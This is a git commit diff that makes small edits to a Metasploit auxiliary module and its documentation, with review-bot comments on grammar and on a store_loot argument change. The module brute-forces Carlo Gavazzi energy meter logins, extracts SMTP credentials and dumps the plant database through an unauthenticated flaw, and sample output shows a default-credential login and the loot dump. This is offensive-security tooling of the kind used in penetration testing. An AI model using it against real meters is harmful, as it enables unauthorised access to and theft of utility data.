Minor edits

bug/bundler_fix
juushya 2017-03-03 00:53:17 +05:30
parent c9a354b844
commit 6bd09c142f
2 changed files with 9 additions and 13 deletions

View File

@ -1,6 +1,6 @@
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db . This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
Vulnerable firmware versions include:
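Review bot: only the stray space before the period in "EWplant.db ." is fixed here, while the same sentence still reads "attempt to extract the SMTP configuration" (the subject is "This module", so it should be "attempts"). Since this documentation file is being touched anyway, fix the verb agreement in the same pass, and keep the wording identical to the module's 'Description' string so the two do not drift further apart.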
@ -27,9 +27,9 @@ msf auxiliary(gavazzi_em_login_loot) > run
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "admin":"admin"
[+] 1.3.3.7:80 - Firmware version A8_U03...
[+] 1.3.3.7:80 - SMTP server: "", SMTP username: "", SMTP password: ""
[*] 1.3.3.7 - dumping EWplant.db
[*] 1.3.3.7:80 - dumping EWplant.db
[+] 1.3.3.7:80 - EWplant.db retrieved successfully!
[+] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000005_moduletest_1.3.3.7_EWplant.db_501578.bin
[+] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000005_moduletest_1.3.3.7_EWplant.db_501578.db
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
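Review bot: the sample output now documents the saved loot path as ending in `.db` instead of `.bin`, but nothing in this hunk explains why the extension changed; it follows from the reworked `store_loot` call in the module, where the extension is derived from the arguments rather than set explicitly. Confirm that the documented filename was captured from a real run of the updated module rather than edited by hand, so the example output stays an accurate record of what an operator will see.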

View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
super(update_info(info,
'Name' => 'Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database',
'Description' => %{
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db . This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include - VMU-C EM prior to firmware Version A11_U05 and VMU-C PV prior to firmware Version A17.
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include - VMU-C EM prior to firmware Version A11_U05 and VMU-C PV prior to firmware Version A17.
},
'References' =>
[
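Review bot: the 'Description' string is a verbatim copy of the documentation text and carries the same grammar issue ("and attempt to extract" should be "attempts"), plus the dash written as a bare hyphen in "Vulnerable firmware versions include - VMU-C EM ...". Fix both here as well so the module metadata shown in `info` reads cleanly; keeping the description in one place (for example the module only) would avoid this duplicated maintenance.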
@ -258,16 +258,12 @@ class MetasploitModule < Msf::Auxiliary
end
if res && res.code == 200
print_status("#{rhost} - dumping EWplant.db")
print_status("#{rhost}:#{rport} - dumping EWplant.db")
print_good("#{rhost}:#{rport} - EWplant.db retrieved successfully!")
path = store_loot(
'EWplant.db',
'SQLite_db/text',
rhost,
res.body,
rport,
'Carlo Gavazzi Energy Meter - EWplant.db'
)
loot_name = 'EWplant.db'
loot_type = 'SQLite_db/text'
loot_desc = 'Carlo Gavazzi EM - EWplant.db'
path = store_loot(loot_name, loot_type, datastore['RHOST'], res.body , loot_desc)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
else
vprint_error("#{rhost}:#{rport} - Failed to retrieve EWplant.db. Set a higher HTTPCLIENTTIMEOUT and try again. Else, check if target is running vulnerable version.?")
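Review bot: the rewritten `store_loot` call changes the positional arguments, not just the formatting: the old call passed `rhost`, `res.body`, `rport`, description, while the new one drops `rport` and passes `loot_desc` in the slot where `rport` used to be. Check that slot against `store_loot`'s signature, because if it is the filename parameter rather than the info/description parameter, the description string becomes the basis of the stored filename and the loot record gets no description at all. Two smaller points in the same lines: `datastore['RHOST']` is used for the host while every adjacent `print_status`/`print_good` uses `rhost`, so prefer `rhost` for consistency with per-target handling in a scanner module; and `res.body ,` has a stray space before the comma. The unchanged `vprint_error` context line also ends in "version.?", which should be a single question mark or period.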